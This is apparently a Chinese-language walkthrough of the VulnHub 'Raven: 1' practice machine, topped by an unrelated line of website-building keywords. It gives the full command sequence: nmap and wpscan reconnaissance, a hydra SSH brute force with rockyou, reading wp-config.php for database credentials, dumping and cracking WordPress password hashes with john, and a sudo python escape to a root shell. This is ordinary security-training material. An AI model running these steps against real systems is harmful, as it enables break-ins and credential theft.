站长工具域名备案查询,做网站的经验和体会,wordpress 在线更新,电脑自己做网站可以吗一、准备工作
kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09;
1.靶场环境
下载链接:Raven: 1 ~ VulnHub
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip sudo arp-scan -l 二、信息收集
1.nmap的信息收集
#xff08;1#xff09;扫描靶机开放的…一、准备工作
kali和靶机都选择NAT模式kali与靶机同网段
1.靶场环境
下载链接:Raven: 1 ~ VulnHub
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip sudo arp-scan -l 二、信息收集
1.nmap的信息收集
1扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集
1靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://192.168.101.127/service.html它的源码发现flag1
2.进入到BLOG发现wordpress网站 3.看到wordpress网站后台登录到入口 DNS域名解析有问题
4.添加后台域名到hosts文件
1编辑hosts文件添加如下内容 sudo vim /etc/hosts 192.168.101.127 raven.local wq 2重新刷新页面访问成功 2WPscan工具
探测WordPress的漏洞可以直接使用kali自带的WPscan先暴力枚举用户名 wpscan --url http://192.168.101.127/wordpress/ -eu 1.发现了两个用户michael和steven将收集到的用户放到user.txt 3hydra工具暴力破解
1.使用hydra运用自身密码库进行暴力破解 cp /usr/share/wordlists/rockyou.txt pass hydra -L user.txt -P pass 192.168.101.127 ssh 获取到ssh登录到用户密码michael 4ssh远程登录 ssh michael192.168.101.127 三、漏洞的发现及利用
1.寻找一下flag相关文件 find / -name *flag* 2/dev/null 1查看flag2.txt,拿到flag2 cat /var/www/flag2.txt 2.MySQL
1查看靶机是否运行mysql ps -ef |grep mysql 2切换到wordpress目录发现config配置文件可能存在用户密码 cd /var/www/html/wordpress ls -la 3查看config文件发现了数据库的用户密码
用户密码为root、Rv3nSecurity cat wp-config.php 4用刚才收集到的数据库用户密码登录mysql mysql -u root -p Rv3nSecurity 5查看mysql的数据库 show databases; 6获取数据库里面的flag3、flag4 use wordpress ; show tables ; desc wp_posts; select * from wp_posts; 7发现两组用户密码 use wordpress ; select * from wp_wp_users ; michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ 8john解码最后得到stevenpink84
把密码放入文件swn里面通过john解码 vim swn.txt cat swn.txt john swn.txt --wordlist/usr/share/wordlists/rockyou.txt 四、提权
1使用steven用户远程登录ssh ssh steven192.168.101.127 pink84 2利用优化命令执行终端的命令提权 sudo python -c import pty; pty.spawn(/bin/bash); flag也可在root查看